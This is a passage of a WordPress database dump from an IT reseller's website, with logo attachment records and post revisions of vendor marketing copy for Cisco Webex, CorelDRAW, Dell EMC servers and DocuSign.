04:49:24','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/D-Link-Logo.png',0,'attachment','image/png',0),(1822,1,'2018-12-12 12:14:41','2018-12-12 04:14:41','DocuSign Logo','DocuSign Logo','DocuSign Logo','inherit','closed','closed','','docusign-logo','','','2018-12-12 12:55:55','2018-12-12 04:55:55','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/DocuSign-Logo.png',0,'attachment','image/png',0),(1823,1,'2018-12-12 12:14:43','2018-12-12 04:14:43','Eset Logo','Eset Logo','Eset Logo','inherit','closed','closed','','eset-logo','','','2018-12-12 12:59:40','2018-12-12 04:59:40','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Eset-Logo.png',0,'attachment','image/png',0),(1825,1,'2018-12-12 12:14:45','2018-12-12 04:14:45','Faronics Logo','Faronics Logo','Faronics Logo','inherit','closed','closed','','faronics-logo','','','2018-12-12 14:06:04','2018-12-12 06:06:04','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Faronics-Logo.png',0,'attachment','image/png',0),(1826,1,'2018-12-12 12:14:46','2018-12-12 04:14:46','Fuji Xerox Logo','Fuji Xerox Logo','Fuji Xerox Logo','inherit','closed','closed','','fuji-xerox-logo','','','2018-12-12 14:12:15','2018-12-12 06:12:15','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Fuji-Xerox-Logo.png',0,'attachment','image/png',0),(1827,1,'2018-12-12 12:14:48','2018-12-12 04:14:48','Houdini','Houdini','Houdini','inherit','closed','closed','','houdini-2','','','2018-12-12 14:15:38','2018-12-12 06:15:38','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Houdini.png',0,'attachment','image/png',0),(1828,1,'2018-12-12 12:14:49','2018-12-12 04:14:49','HPE Logo','HPE Logo','HPE Logo','inherit','closed','closed','','hpe-logo','','','2018-12-12 14:20:01','2018-12-12 06:20:01','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/HPE-Logo.png',0,'attachment','image/png',0),(1829,1,'2018-12-12 12:14:50','2018-12-12 04:14:50','Huawei Logo','Huawei Logo','Huawei Logo','inherit','closed','closed','','huawei-logo','','','2018-12-12 14:22:34','2018-12-12 06:22:34','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Huawei-Logo.png',0,'attachment','image/png',0),(1830,1,'2018-12-12 12:14:52','2018-12-12 04:14:52','IBM Logo','IBM Logo','IBM Logo','inherit','closed','closed','','ibm-logo','','','2018-12-12 14:23:54','2018-12-12 06:23:54','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/IBM-Logo.png',0,'attachment','image/png',0),(1831,1,'2018-12-12 12:14:54','2018-12-12 04:14:54','LG Logo','LG Logo','LG Logo','inherit','closed','closed','','lg-logo','','','2018-12-12 14:30:02','2018-12-12 06:30:02','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/LG-Logo.png',0,'attachment','image/png',0),(1832,1,'2018-12-12 12:14:55','2018-12-12 04:14:55','MapInfo Logo','MapInfo Logo','MapInfo Logo','inherit','closed','closed','','mapinfo-logo','','','2018-12-12 14:33:04','2018-12-12 06:33:04','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/MapInfo-Logo.png',0,'attachment','image/png',0),(1833,1,'2018-12-12 12:14:57','2018-12-12 04:14:57','Motorola Logo','Motorola Logo','Motorola Logo','inherit','closed','closed','','motorola-logo','','','2018-12-12 14:39:41','2018-12-12 06:39:41','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Logo.png',0,'attachment','image/png',0),(1834,1,'2018-12-12 12:14:58','2018-12-12 04:14:58','Nitro Logo','Nitro Logo','Nitro Logo','inherit','closed','closed','','nitro-logo','','','2018-12-12 14:46:13','2018-12-12 06:46:13','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Nitro-Logo.png',0,'attachment','image/png',0),(1835,1,'2018-12-12 12:15:00','2018-12-12 04:15:00','Nutanix Logo','Nutanix Logo','Nutanix Logo','inherit','closed','closed','','nutanix-logo','','','2018-12-12 14:49:18','2018-12-12 06:49:18','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Nutanix-Logo.png',0,'attachment','image/png',0),(1836,1,'2018-12-12 12:15:02','2018-12-12 04:15:02','Panasonic Logo','Panasonic Logo','Panasonic Logo','inherit','closed','closed','','panasonic-logo','','','2018-12-12 14:52:43','2018-12-12 06:52:43','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Panasonic-Logo.png',0,'attachment','image/png',0),(1837,1,'2018-12-12 12:15:03','2018-12-12 04:15:03','Qnap Logo','Qnap Logo','Qnap Logo','inherit','closed','closed','','qnap-logo','','','2018-12-12 14:55:49','2018-12-12 06:55:49','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Qnap-Logo.png',0,'attachment','image/png',0),(1838,1,'2018-12-12 12:15:05','2018-12-12 04:15:05','Sage Logo','Sage Logo','Sage Logo','inherit','closed','closed','','sage-logo','','','2018-12-12 15:00:32','2018-12-12 07:00:32','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Sage-Logo.png',0,'attachment','image/png',0),(1839,1,'2018-12-12 12:15:06','2018-12-12 04:15:06','SolarWinds Logo','SolarWinds Logo','SolarWinds Logo','inherit','closed','closed','','solarwinds-logo','','','2018-12-12 15:05:03','2018-12-12 07:05:03','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/SolarWinds-Logo.png',0,'attachment','image/png',0),(1840,1,'2018-12-12 12:15:08','2018-12-12 04:15:08','Sophos Logo','Sophos Logo','Sophos Logo','inherit','closed','closed','','sophos-logo','','','2018-12-12 15:08:31','2018-12-12 07:08:31','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Sophos-Logo.png',0,'attachment','image/png',0),(1841,1,'2018-12-12 12:15:09','2018-12-12 04:15:09','Ubiquiti Logo','Ubiquiti Logo','Ubiquiti Logo','inherit','closed','closed','','ubiquiti-logo','','','2018-12-12 15:14:29','2018-12-12 07:14:29','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Ubiquiti-Logo.png',0,'attachment','image/png',0),(1842,1,'2018-12-12 12:15:11','2018-12-12 04:15:11','WatchGuard Logo','WatchGuard Logo','WatchGuard Logo','inherit','closed','closed','','watchguard-logo','','','2018-12-12 15:19:09','2018-12-12 07:19:09','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/WatchGuard-Logo.png',0,'attachment','image/png',0),(1843,1,'2018-12-12 12:15:13','2018-12-12 04:15:13','WD Logo','WD Logo','WD Logo','inherit','closed','closed','','wd-logo','','','2018-12-12 15:20:49','2018-12-12 07:20:49','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/WD-Logo.png',0,'attachment','image/png',0),(1844,1,'2018-12-12 12:15:15','2018-12-12 04:15:15','Winrar Logo','Winrar Logo','Winrar Logo','inherit','closed','closed','','winrar-logo','','','2018-12-12 15:24:10','2018-12-12 07:24:10','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Winrar-Logo.png',0,'attachment','image/png',0),(1845,1,'2018-12-12 12:15:17','2018-12-12 04:15:17','Zoom Logo','Zoom Logo','Zoom Logo','inherit','closed','closed','','zoom-logo','','','2018-12-12 15:27:05','2018-12-12 07:27:05','',1357,'https://bintara.com.my/wp-content/uploads/2018/12/Zoom-Logo.png',0,'attachment','image/png',0),(1862,1,'2018-12-12 12:37:05','2018-12-12 04:37:05','<a href=\"http://bintara.com.my/canon\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1819\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Canon-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','CANON','','inherit','closed','closed','','1361-autosave-v1','','','2018-12-12 12:37:05','2018-12-12 04:37:05','',1361,'https://bintara.com.my/blog/2018/12/12/1361-autosave-v1/',0,'revision','',0),(1851,1,'2018-12-14 20:57:09','2018-12-14 12:57:09','iPad Pro, MacBook Pro, iMac Pro. <!--more-->\n\n<img class=\"alignnone size-full wp-image-1814\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Apple-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','APPLE','','inherit','closed','closed','','1333-autosave-v1','','','2018-12-14 20:57:09','2018-12-14 12:57:09','',1333,'https://bintara.com.my/blog/2018/12/12/1333-autosave-v1/',0,'revision','',0),(1852,1,'2018-12-12 12:24:37','2018-12-12 04:24:37','Enterprise Wireless LAN Solutions. <a href=\"http://bintara.com.my/aruba\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1815\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Aruba.png\" alt=\"\" width=\"1024\" height=\"681\" />','ARUBA','','inherit','closed','closed','','1335-autosave-v1','','','2018-12-12 12:24:37','2018-12-12 04:24:37','',1335,'https://bintara.com.my/blog/2018/12/12/1335-autosave-v1/',0,'revision','',0),(1854,1,'2018-12-12 12:26:20','2018-12-12 04:26:20','Notebooks, Desktop and Monitors. Read More...\n\n&nbsp;','ASUS','','inherit','closed','closed','','1341-autosave-v1','','','2018-12-12 12:26:20','2018-12-12 04:26:20','',1341,'https://bintara.com.my/blog/2018/12/12/1341-autosave-v1/',0,'revision','',0),(1855,1,'2018-12-12 12:30:21','2018-12-12 04:30:21','','meetings_2','','inherit','closed','closed','','meetings_2','','','2018-12-12 12:30:21','2018-12-12 04:30:21','',1450,'https://bintara.com.my/wp-content/uploads/2018/12/meetings_2.jpg',0,'attachment','image/jpeg',0),(1856,1,'2018-12-12 12:31:15','2018-12-12 04:31:15','','meetings_3','','inherit','closed','closed','','meetings_3','','','2018-12-12 12:31:15','2018-12-12 04:31:15','',1450,'https://bintara.com.my/wp-content/uploads/2018/12/meetings_3.png',0,'attachment','image/png',0),(1858,1,'2018-12-12 12:32:50','2018-12-12 04:32:50','','meetings_5','','inherit','closed','closed','','meetings_5','','','2018-12-12 12:32:50','2018-12-12 04:32:50','',1450,'https://bintara.com.my/wp-content/uploads/2018/12/meetings_5.png',0,'attachment','image/png',0),(1859,1,'2018-12-12 12:33:22','2018-12-12 04:33:22','<h2>CISCO WEBEX</h2>\r\n<h3>SIMPLY THE BEST VIDEO CONFERENCING &amp; ONLINE MEETINGS.</h3>\r\nWith Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.\r\n\r\n<img class=\"alignnone wp-image-1855 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_2-236x300.jpg\" alt=\"\" width=\"236\" height=\"300\" />\r\n<h4>MEET FACE TO FACE. WHEREVER YOU ARE.</h4>\r\nVideo conferencing is as simple and seamless as meeting in person. With the Webex mobile app, you can meet absolutely anywhere. Hosting is easy and joining is easier-simply click on your link to join. Include everyone, even guests.\r\n\r\n<img class=\"alignnone wp-image-1856 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_3-216x300.png\" alt=\"\" width=\"216\" height=\"300\" />\r\n<h4>GET ON THE SAME PAGE.</h4>\r\nSeeing is believing. Share your screen so everyone can view your document, spreadsheet, or application. You can even have the host record the meeting so others can get up to speed later.\r\n\r\n<img class=\"alignnone wp-image-1857 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_4-300x206.jpg\" alt=\"\" width=\"300\" height=\"206\" />\r\n<h4>INVITE ANYONE OR EVERYONE.</h4>\r\nSchedule and join meetings from where you work. Everyone you invite can join your online meeting, no matter how theyâ€™re connecting, even guests. Big crowd? Not a problem. You can meet with over 40,000 people.\r\n\r\n<img class=\"alignnone wp-image-1858 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_5-240x300.png\" alt=\"\" width=\"240\" height=\"300\" />\r\n<h4>CLICK OR TAP TO JOIN.</h4>\r\nEasily start or join using Productivity Tools. Now you can join a video meeting with no dialing in. You can also host or join without a download by using the Webex app.\r\n\r\n&nbsp;\r\n<h4>HOST EVENTS. TRAIN YOUR TEAM. SUPPORT YOUR CUSTOMERS.</h4>\r\n<strong>WEBINARS</strong>\r\n\r\nWith Cisco Webex Events, host interactive webinars with HD video and broadcast-quality audio for audiences up to 3,000.\r\n\r\n<strong>Â WEBCASTING</strong>\r\n\r\nHost large-scale virtual events for more than 40,000 participants with expertise from Cisco Webex Webcasting to ensure itâ€™s a success.\r\n\r\n<strong>Â ONLINE LEARNING</strong>\r\n\r\nLead live or on-demand trainings with Cisco Webex Training. Host breakout sessions, testing and automated grading with over 1,000 participants.\r\n\r\n<strong>REMOTE SUPPORT</strong>\r\n\r\nCisco Webex Support provides efficient customer service with remote desktop control and live chat.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Cisco','','inherit','closed','closed','','1450-revision-v1','','','2018-12-12 12:33:22','2018-12-12 04:33:22','',1450,'https://bintara.com.my/blog/2018/12/12/1450-revision-v1/',0,'revision','',0),(3227,1,'2019-09-23 15:07:59','2019-09-23 07:07:59','Cisco','Cisco','Cisco','inherit','closed','closed','','artboard-81x','','','2019-09-23 15:08:39','2019-09-23 07:08:39','',1363,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-81x.png',0,'attachment','image/png',0),(3228,1,'2019-09-23 15:11:45','2019-09-23 07:11:45','Anydesk','Anydesk','Anydesk','inherit','closed','closed','','artboard-131x','','','2019-09-23 15:11:59','2019-09-23 07:11:59','',1328,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-131x.png',0,'attachment','image/png',0),(1861,1,'2018-12-12 12:35:14','2018-12-12 04:35:14','<h2>CISCO WEBEX</h2>\r\n<h3>SIMPLY THE BEST VIDEO CONFERENCING &amp; ONLINE MEETINGS.</h3>\r\nWith Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.\r\n\r\n<img class=\"alignnone wp-image-1855 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_2-236x300.jpg\" alt=\"\" width=\"236\" height=\"300\" />\r\n<h4>MEET FACE TO FACE. WHEREVER YOU ARE.</h4>\r\nVideo conferencing is as simple and seamless as meeting in person. With the Webex mobile app, you can meet absolutely anywhere. Hosting is easy and joining is easier-simply click on your link to join. Include everyone, even guests.\r\n\r\n<img class=\"alignnone wp-image-1856 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_3-216x300.png\" alt=\"\" width=\"216\" height=\"300\" />\r\n<h4>GET ON THE SAME PAGE.</h4>\r\nSeeing is believing. Share your screen so everyone can view your document, spreadsheet, or application. You can even have the host record the meeting so others can get up to speed later.\r\n\r\n<img class=\"alignnone wp-image-1857 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_4-300x206.jpg\" alt=\"\" width=\"300\" height=\"206\" />\r\n<h4>INVITE ANYONE OR EVERYONE.</h4>\r\nSchedule and join meetings from where you work. Everyone you invite can join your online meeting, no matter how theyâ€™re connecting, even guests. Big crowd? Not a problem. You can meet with over 40,000 people.\r\n\r\n<img class=\"alignnone wp-image-1858 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetings_5-240x300.png\" alt=\"\" width=\"240\" height=\"300\" />\r\n<h4>CLICK OR TAP TO JOIN.</h4>\r\nEasily start or join using Productivity Tools. Now you can join a video meeting with no dialing in. You can also host or join without a download by using the Webex app.\r\n\r\n&nbsp;\r\n<h4>HOST EVENTS. TRAIN YOUR TEAM. SUPPORT YOUR CUSTOMERS.</h4>\r\n<strong>WEBINARS</strong>\r\n\r\nWith Cisco Webex Events, host interactive webinars with HD video and broadcast-quality audio for audiences up to 3,000.\r\n\r\n<strong>WEBCASTING</strong>\r\n\r\nHost large-scale virtual events for more than 40,000 participants with expertise from Cisco Webex Webcasting to ensure itâ€™s a success.\r\n\r\n<strong>ONLINE LEARNING</strong>\r\n\r\nLead live or on-demand trainings with Cisco Webex Training. Host breakout sessions, testing and automated grading with over 1,000 participants.\r\n\r\n<strong>REMOTE SUPPORT</strong>\r\n\r\nCisco Webex Support provides efficient customer service with remote desktop control and live chat.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Cisco','','inherit','closed','closed','','1450-revision-v1','','','2018-12-12 12:35:14','2018-12-12 04:35:14','',1450,'https://bintara.com.my/blog/2018/12/12/1450-revision-v1/',0,'revision','',0),(1866,1,'2018-12-12 12:46:46','2018-12-12 04:46:46','<h2>CorelDRAW</h2>\r\n<h3>CorelDRAW Graphics Suite 2018</h3>\r\n<h4>Graphic design software</h4>\r\n<ul>\r\n 	<li>New state-of-the-art Symmetry mode</li>\r\n 	<li>New creative effects with Block Shadow tool</li>\r\n 	<li>New quick and direct publish to WordPress</li>\r\n 	<li>Newly integrated features: Impact tool, PhotoCocktail and more</li>\r\n</ul>\r\n<h3 style=\"text-align: center;\">Empower your creativity</h3>\r\n<p class=\"sectionDesc\" style=\"text-align: center;\">CorelDRAWÂ® Graphics Suite 2018 is a leading graphic design software enjoyed by millions of professionals, small business owners, and design enthusiasts worldwide. It offers a seamless design experience for graphics, layout, illustration, photo editing, tracing, web images, print projects, art, typography, and more. Design with confidence and achieve stunning results.</p>\r\n\r\n<iframe src=\"https://www.youtube.com/embed/Up_2sjU4GfU\" width=\"960\" height=\"540\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<ol class=\"circles-list\">\r\n 	<li>\r\n<h4>Comprehensive</h4>\r\nEnjoy professional applications to produce any design or photo project.</li>\r\n 	<li>\r\n<h4>Creative</h4>\r\nExplore versatile, intuitive tools to express your unique style and impress your audience.</li>\r\n 	<li>\r\n<h4>Productive</h4>\r\nRely on industry-leading file format compatibility and faster processing to make complex workflow tasks more efficient.</li>\r\n 	<li>\r\n<h4>Innovative</h4>\r\nStay on the cutting-edge of design technology and enrich your creative journey with state-of-the-art tools.</li>\r\n 	<li>\r\n<h4>User-friendly</h4>\r\nEnjoy a seamless design experience with a tailor-made interface and unmatched customization capabilities.</li>\r\n</ol>','CorelDRAW','','inherit','closed','closed','','1472-revision-v1','','','2018-12-12 12:46:46','2018-12-12 04:46:46','',1472,'https://bintara.com.my/blog/2018/12/12/1472-revision-v1/',0,'revision','',0),(1868,1,'2018-12-12 12:48:39','2018-12-12 04:48:39','WiFi Routers, Switches and Cabling. Read More...','D-LINK','','inherit','closed','closed','','1371-autosave-v1','','','2018-12-12 12:48:39','2018-12-12 04:48:39','',1371,'https://bintara.com.my/blog/2018/12/12/1371-autosave-v1/',0,'revision','',0),(3350,1,'2019-09-25 11:57:18','2019-09-25 03:57:18','<h2>CorelDRAW Graphics Suite 2018</h2>\r\n\r\n&nbsp;\r\n<h3>Graphic design software</h3>\r\n<ul>\r\n 	<li>New state-of-the-art Symmetry mode</li>\r\n 	<li>New creative effects with Block Shadow tool</li>\r\n 	<li>New quick and direct publish to WordPress</li>\r\n 	<li>Newly integrated features: Impact tool, PhotoCocktail and more</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h3>Empower your creativity</h3>\r\n<p class=\"sectionDesc\" style=\"text-align: center;\">CorelDRAWÂ® Graphics Suite 2018 is a leading graphic design software enjoyed by millions of professionals, small business owners, and design enthusiasts worldwide. It offers a seamless design experience for graphics, layout, illustration, photo editing, tracing, web images, print projects, art, typography, and more. Design with confidence and achieve stunning results.</p>\r\n<iframe src=\"https://www.youtube.com/embed/Up_2sjU4GfU\" width=\"960\" height=\"540\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<ol class=\"circles-list\">\r\n 	<li>\r\n<h4>Comprehensive</h4>\r\nEnjoy professional applications to produce any design or photo project.</li>\r\n 	<li>\r\n<h4>Creative</h4>\r\nExplore versatile, intuitive tools to express your unique style and impress your audience.</li>\r\n 	<li>\r\n<h4>Productive</h4>\r\nRely on industry-leading file format compatibility and faster processing to make complex workflow tasks more efficient.</li>\r\n 	<li>\r\n<h4>Innovative</h4>\r\nStay on the cutting-edge of design technology and enrich your creative journey with state-of-the-art tools.</li>\r\n 	<li>\r\n<h4>User-friendly</h4>\r\nEnjoy a seamless design experience with a tailor-made interface and unmatched customization capabilities.</li>\r\n</ol>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','CorelDRAW','','inherit','closed','closed','','1472-revision-v1','','','2019-09-25 11:57:18','2019-09-25 03:57:18','',1472,'https://bintara.com.my/blog/2019/09/25/1472-revision-v1/',0,'revision','',0),(1869,1,'2018-12-12 12:47:11','2018-12-12 04:47:11','<h2>CorelDRAW</h2>\r\n<h3>CorelDRAW Graphics Suite 2018</h3>\r\n<h4>Graphic design software</h4>\r\n<ul>\r\n 	<li>New state-of-the-art Symmetry mode</li>\r\n 	<li>New creative effects with Block Shadow tool</li>\r\n 	<li>New quick and direct publish to WordPress</li>\r\n 	<li>Newly integrated features: Impact tool, PhotoCocktail and more</li>\r\n</ul>\r\n<h3 style=\"text-align: center;\">Empower your creativity</h3>\r\n<p class=\"sectionDesc\" style=\"text-align: center;\">CorelDRAWÂ® Graphics Suite 2018 is a leading graphic design software enjoyed by millions of professionals, small business owners, and design enthusiasts worldwide. It offers a seamless design experience for graphics, layout, illustration, photo editing, tracing, web images, print projects, art, typography, and more. Design with confidence and achieve stunning results.</p>\r\n<iframe src=\"https://www.youtube.com/embed/Up_2sjU4GfU\" width=\"960\" height=\"540\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<ol class=\"circles-list\">\r\n 	<li>\r\n<h4>Comprehensive</h4>\r\nEnjoy professional applications to produce any design or photo project.</li>\r\n 	<li>\r\n<h4>Creative</h4>\r\nExplore versatile, intuitive tools to express your unique style and impress your audience.</li>\r\n 	<li>\r\n<h4>Productive</h4>\r\nRely on industry-leading file format compatibility and faster processing to make complex workflow tasks more efficient.</li>\r\n 	<li>\r\n<h4>Innovative</h4>\r\nStay on the cutting-edge of design technology and enrich your creative journey with state-of-the-art tools.</li>\r\n 	<li>\r\n<h4>User-friendly</h4>\r\nEnjoy a seamless design experience with a tailor-made interface and unmatched customization capabilities.</li>\r\n</ol>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','CorelDRAW','','inherit','closed','closed','','1472-revision-v1','','','2018-12-12 12:47:11','2018-12-12 04:47:11','',1472,'https://bintara.com.my/blog/2018/12/12/1472-revision-v1/',0,'revision','',0),(2304,1,'2019-09-25 15:43:18','2019-09-25 07:43:18','<h2 class=\"heading\">Servers built for today\'s most demanding workloads and tomorrow\'s.</h2>\n<div class=\"rte \">\n\nPowerEdge MX powers both traditional and emerging workloads with up to 5x network throughput,Â simple unified management and multigenerational investment protection.\n\nnbsp;\n<h3>Rack Servers</h3>\nReady your data center to handle any workload. PowerEdge rack servers combine a highly scalable architecture and optimum balance of compute and memory to maximize performance across the widest range of applications.\n<ul>\n 	<li>World record in SAP performance11</li>\n 	<li>Widest range of in-server storage options ever in PowerEdge servers</li>\n 	<li>IT Pro â€œEditorâ€™s Choiceâ€ award with 5-star ratings (R640 &amp; R740xd)</li>\n 	<li>#1 in price/performance (R740xd)24</li>\n 	<li>Powerful 4-socket performance and GPU acceleration for data analytics, AI and machine learning</li>\n</ul>\n\n&nbsp;\n<h3>Modular Infrastructure</h3>\nCreate an agile, future-ready data center with flexible, easily expandable compute, networking and storage. The PowerEdge modular portfolio allows you to precisely tailor, quickly deploy and easily manage infrastructure while lowering operating costs.\n<ul>\n 	<li>PowerEdge MX â€“ Modular, integrated solution with easy deployment, management, and maximum longevity</li>\n 	<li>PowerEdge FX Series â€“ Hybrid platform with the density of blade servers and the simplicity of rack-based systems</li>\n 	<li>PowerEdge VRTX â€“ Compact chassis integrating servers, storage, networking and management</li>\n 	<li>PowerEdge C Series â€“ Accelerated computing platform for high-performance cognitive workloads</li>\n</ul>\n\n&nbsp;\n<h3>Tower Servers</h3>\nPowerEdge tower servers are designed to grow with your organization, at your pace.\n<ul>\n 	<li>Flexible configurations with large internal capacities</li>\n 	<li>Broad portfolio for SOHO, ROBO and SMB markets</li>\n 	<li>Rackable for continued use as companies grow</li>\n</ul>\n\n\n&nbsp;\n<h3>Systems Management Software</h3>\n<div class=\"info-text server-info-text\">\n\nTake control and automate the full IT lifecycle with the OpenManage portfolio. Increase the productivity, reliability and cost effectiveness of your servers while making IT operations more efficient.\n<ul class=\"server-list\">\n 	<li>Powerful infrastructure automation with OpenManage Enterprise</li>\n 	<li>Anytime, anywhere access to PowerEdge server status with OpenManage Mobile</li>\n 	<li>Leverage existing management consoles with OpenManage Integrations for VMware vCenter<sup>Â®</sup>, Microsoft<sup>Â®</sup>Â System Center and Ansible Modules</li>\n</ul>\n\n\n&nbsp;\n<h3 class=\"title\">Industrial-Grade Servers</h3>\nThe new PowerEdge XR2 server delivers long life for harsh or space-constrained environments, without compromising on performance.\n<ul class=\"server-list\">\n 	<li>Secure storage â€“ Up to 8 high-capacity SSDs with up to 30TB of storage</li>\n 	<li>Shock certified to 40G of operational shock with SSDs<sup>29</sup></li>\n 	<li>Extreme temperature range â€“ Cold start down to -15Â°C and up to 45Â°C with excursions up to 55Â°C for 8 hours at a time</li>\n</ul>\n</div>\n&nbsp;\n\n&amp;nbsp;\n<h3>Ready Nodes</h3>\n<div class=\"info-text server-info-text\">\n\nBuild or scale with PowerEdge servers pre-configured for your workloads.\n<ul class=\"server-list\">\n 	<li>Known-good configurations for VMware vSAN, Microsoft Storage Spaces Direct, VxFlex and SAP HANA</li>\n 	<li>Save time on configuration and testing</li>\n 	<li>Solution-level customer support included</li>\n</ul>\n[maxbutton id=\"1\" ]\n\n</div>\n</div>','Dell EMC','','inherit','closed','closed','','1478-autosave-v1','','','2019-09-25 15:43:18','2019-09-25 07:43:18','',1478,'https://bintara.com.my/blog/2018/12/17/1478-autosave-v1/',0,'revision','',0),(2121,1,'2018-12-14 09:15:59','2018-12-14 01:15:59','<h3>CorelDRAW Graphics Suite 2018</h3>\r\n<h4>Graphic design software</h4>\r\n<ul>\r\n 	<li>New state-of-the-art Symmetry mode</li>\r\n 	<li>New creative effects with Block Shadow tool</li>\r\n 	<li>New quick and direct publish to WordPress</li>\r\n 	<li>Newly integrated features: Impact tool, PhotoCocktail and more</li>\r\n</ul>\r\n<h3 style=\"text-align: center;\">Empower your creativity</h3>\r\n<p class=\"sectionDesc\" style=\"text-align: center;\">CorelDRAWÂ® Graphics Suite 2018 is a leading graphic design software enjoyed by millions of professionals, small business owners, and design enthusiasts worldwide. It offers a seamless design experience for graphics, layout, illustration, photo editing, tracing, web images, print projects, art, typography, and more. Design with confidence and achieve stunning results.</p>\r\n<iframe src=\"https://www.youtube.com/embed/Up_2sjU4GfU\" width=\"960\" height=\"540\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<ol class=\"circles-list\">\r\n 	<li>\r\n<h4>Comprehensive</h4>\r\nEnjoy professional applications to produce any design or photo project.</li>\r\n 	<li>\r\n<h4>Creative</h4>\r\nExplore versatile, intuitive tools to express your unique style and impress your audience.</li>\r\n 	<li>\r\n<h4>Productive</h4>\r\nRely on industry-leading file format compatibility and faster processing to make complex workflow tasks more efficient.</li>\r\n 	<li>\r\n<h4>Innovative</h4>\r\nStay on the cutting-edge of design technology and enrich your creative journey with state-of-the-art tools.</li>\r\n 	<li>\r\n<h4>User-friendly</h4>\r\nEnjoy a seamless design experience with a tailor-made interface and unmatched customization capabilities.</li>\r\n</ol>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','CorelDRAW','','inherit','closed','closed','','1472-revision-v1','','','2018-12-14 09:15:59','2018-12-14 01:15:59','',1472,'https://bintara.com.my/blog/2018/12/14/1472-revision-v1/',0,'revision','',0),(1875,1,'2018-12-12 12:56:51','2018-12-12 04:56:51','<h2>DocuSign</h2>\r\n<h3>Grow your business.\r\nShrink your paperwork.</h3>\r\n<h3>Delight customers with an easier way to do business</h3>\r\nWhy do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collectionâ€”on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.\r\n<h3><img class=\"media-element file-default\" src=\"https://www.docusign.com/sites/default/files/keybenefits-1.png\" alt=\"DocuSign signing experience in mobile device\" width=\"438\" height=\"212\" data-delta=\"1\" /></h3>\r\n<h3>Simple to implement, easy to useâ€”customers and employees will be up and running in minutes</h3>\r\nWith the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature,Â collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any device.\r\n<h3><img class=\"media-element file-default\" src=\"https://www.docusign.com/sites/default/files/smb-keybenefits-2-2_07.png\" alt=\"\" width=\"392\" height=\"184\" data-delta=\"1\" /></h3>\r\n<h3>Works with the applications, services and devices your business already uses</h3>\r\nDocuSign fits right into your existing systems so youâ€™ll be productive, instantly.Â Use DocuSign with over 300 popular servicesÂ like Google, Salesforce and Box, orÂ access our award-winning appÂ from practically any mobile device. Works with virtually any kind of document.\r\n<h3><img class=\"media-element file-default\" src=\"https://www.docusign.com/sites/default/files/SMB.png\" alt=\"\" width=\"460\" height=\"144\" data-delta=\"3\" /></h3>\r\n<h3>The reliable, globally-trusted service for electronic signatures</h3>\r\nHundreds of millions of people rely on DocuSign as the eSignature standard around the world. Our technology architecture has enabled us to deliver 99.99% platform availability, ensuring your agreements and approvals are signed and sent.\r\n<h2></h2>\r\n<h3>Do more with the #1 eSignature platform for business</h3>\r\n<ul>\r\n 	<li>Simple and fast setup gets you started immediately</li>\r\n 	<li>99.99% platform availability keeps your business running at all hours</li>\r\n 	<li>Flexible workflows to automate any agreement or approval process</li>\r\n 	<li>Rigorous security standards keep sensitive documents safe</li>\r\n 	<li>Instant visibility into document status and powerful reporting</li>\r\n 